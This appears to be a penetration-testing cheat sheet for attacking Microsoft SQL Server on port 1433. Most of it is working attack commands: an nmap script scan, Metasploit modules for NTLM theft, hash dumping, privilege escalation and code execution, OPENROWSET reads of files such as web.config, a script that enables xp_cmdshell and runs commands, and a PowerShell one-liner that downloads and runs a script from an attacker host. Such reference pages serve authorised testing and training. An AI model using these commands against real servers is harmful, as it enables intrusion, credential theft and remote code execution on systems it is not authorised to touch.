# MS-SQL - port 1433

## Scan

```
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
```

## Metasploit modules

{% hint style="warning" %}
Note: all of these modules require valid MSSQL credentials (or Windows credentials accepted by the instance).
{% endhint %}

```bash
# NTLM theft: makes the SQL Server service account authenticate to your host (start Responder first)
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

# Information gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata   # search tables/columns for sensitive data and sample it
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_idf                  # interesting data finder

# Privilege escalation
msf> use exploit/windows/mssql/mssql_linkcrawler          # crawl linked servers and abuse links with higher privileges
msf> use admin/mssql/mssql_escalate_execute_as            # if the login has IMPERSONATE on a sysadmin login, escalate through EXECUTE AS
msf> use admin/mssql/mssql_escalate_dbowner               # db_owner on a TRUSTWORTHY database owned by a sysadmin -> sysadmin

# Code execution
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload

# Add a new sysadmin login from an existing meterpreter session on the SQL host
msf> use windows/manage/mssql_local_auth_bypass
```

## Connecting

### From a Linux machine

```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
```

### From a Windows machine

Download SSMS (*SQL Server Management Studio*)

<https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms>

{% hint style="info" %}
More convenient (graphical interface)
{% endhint %}

## Reading local files

`OPENROWSET(BULK ...)` reads the file with the SQL Server service account's NTFS rights, not the login's, and requires the `ADMINISTER BULK OPERATIONS` server permission (held by `sysadmin` and the `bulkadmin` role).

```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
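The following is an added example (not code from the original page): it checks the permission before trying, reads a text file and a binary file, and falls back to `xp_dirtree` for directory listing when `xp_cmdshell` is not available. The file paths are assumed targets, not something the page specifies.

```sql
-- Added example, not from the original page. Target paths are assumptions.

-- 1 = allowed; 0 = the OPENROWSET calls below fail with
-- "You do not have permission to use the bulk load statement" (error 4834)
SELECT HAS_PERMS_BY_NAME(NULL, NULL, 'ADMINISTER BULK OPERATIONS') AS can_bulk_read;

-- Text file: SINGLE_CLOB returns the whole file as one varchar(max) column named BulkColumn
SELECT BulkColumn AS Contents
FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS f;

-- Arbitrary/binary file: SINGLE_BLOB returns varbinary(max); convert it if it is really text
-- (e.g. a web.config that may contain a connection string)
SELECT CONVERT(varchar(max), BulkColumn) AS Contents
FROM OPENROWSET(BULK N'C:\inetpub\wwwroot\web.config', SINGLE_BLOB) AS f;

-- Directory listing without xp_cmdshell. xp_dirtree is executable by public on default
-- installs, which is also why it is the usual UNC-path trick behind mssql_ntlm_stealer.
-- Arguments: path, depth (1 = this directory only), include files (1) or folders only (0)
EXEC master..xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
```

Because the read happens under the service account, a low-privileged login that somehow obtained bulk rights can still reach files its own Windows identity never could; conversely, a `sysadmin` login on an instance whose service runs as a low-privileged virtual account may get "Cannot bulk load ... Access is denied" on files outside the SQL Server directories.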

## Code execution

{% hint style="info" %}
To run OS commands through MSSQL, xp\_cmdshell must be enabled. It is off by default; if it is off, it can be turned on with sufficient privileges (the `ALTER SETTINGS` server permission, which `sysadmin` and `serveradmin` hold implicitly). Commands run as the SQL Server service account (or as the configured proxy account for non-sysadmin callers).
{% endhint %}

### Check

```
> EXEC xp_cmdshell 'whoami';
> go
```

If the procedure is disabled the call fails with error 15281 ("SQL Server blocked access to procedure 'sys.xp_cmdshell' ...").

### Enable xp\_cmdshell

This short form only works when 'show advanced options' is already set to 1; otherwise `sp_configure` rejects 'xp_cmdshell' as an unknown or advanced option and the full sequence below is needed.

```
> EXEC sp_configure 'xp_cmdshell', 1;
> reconfigure;
> go

> EXEC xp_cmdshell 'whoami';
> go
```

### Force enabling

```
> EXEC sp_configure 'show advanced options', 1;
> reconfigure;
> go

> EXEC sp_configure 'xp_cmdshell', 1;
> reconfigure;
> go

> EXEC xp_cmdshell 'whoami';
> go
```

Each `sp_configure` change is written to the SQL Server error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), so expect it to be visible to defenders.
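The steps above as one script, added here as an example and not taken from the original page: it reads the current state from `sys.configurations`, only enables what is actually off, captures the command output in a table, and restores the previous configuration afterwards. The command (`whoami /priv`) is just a placeholder.

```sql
-- Added example, not from the original page. Requires ALTER SETTINGS (sysadmin/serveradmin).
DECLARE @adv int, @cmdshell int;

-- value_in_use is the running value; reading it changes nothing and needs no special rights
SELECT @adv = CONVERT(int, value_in_use)
FROM sys.configurations WHERE name = 'show advanced options';
SELECT @cmdshell = CONVERT(int, value_in_use)
FROM sys.configurations WHERE name = 'xp_cmdshell';

IF @cmdshell = 0
BEGIN
    -- 'xp_cmdshell' is an advanced option: sp_configure refuses it while 'show advanced options' is 0
    IF @adv = 0
    BEGIN
        EXEC sp_configure 'show advanced options', 1;
        RECONFIGURE;
    END
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END

-- Collect the output in a table instead of scrolling it; xp_cmdshell ends with a NULL row
DECLARE @out TABLE (line nvarchar(4000));
INSERT INTO @out EXEC master..xp_cmdshell 'whoami /priv';   -- placeholder command
SELECT line FROM @out WHERE line IS NOT NULL;

-- Put the configuration back the way it was: a left-on xp_cmdshell is both an obvious
-- finding for the defender and a ready-made foothold for the next attacker
IF @cmdshell = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    IF @adv = 0
    BEGIN
        EXEC sp_configure 'show advanced options', 0;
        RECONFIGURE;
    END
END
```

Run it as a single batch (in sqsh, end it with `go`); the `@`-variables do not survive across batches. Capturing the output into a table is also what lets you `WHERE line LIKE '%SeImpersonate%'` on it rather than reading raw rows.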

### File download

Use single quotes for the T-SQL string and double the single quotes inside the PowerShell command; a command wrapped in double quotes is only accepted when `QUOTED_IDENTIFIER` is OFF.

```
> EXEC xp_cmdshell 'powershell.exe -exec bypass -c "iex(new-object net.webclient).downloadstring(''http://<your ip>:<port>/script.ps1'')"';
> go
```

#### With CrackMapExec

```bash
# Download a file from the target (remote path first, then local destination)
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path

# Upload a file to the target (local path first, then remote destination)
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
```
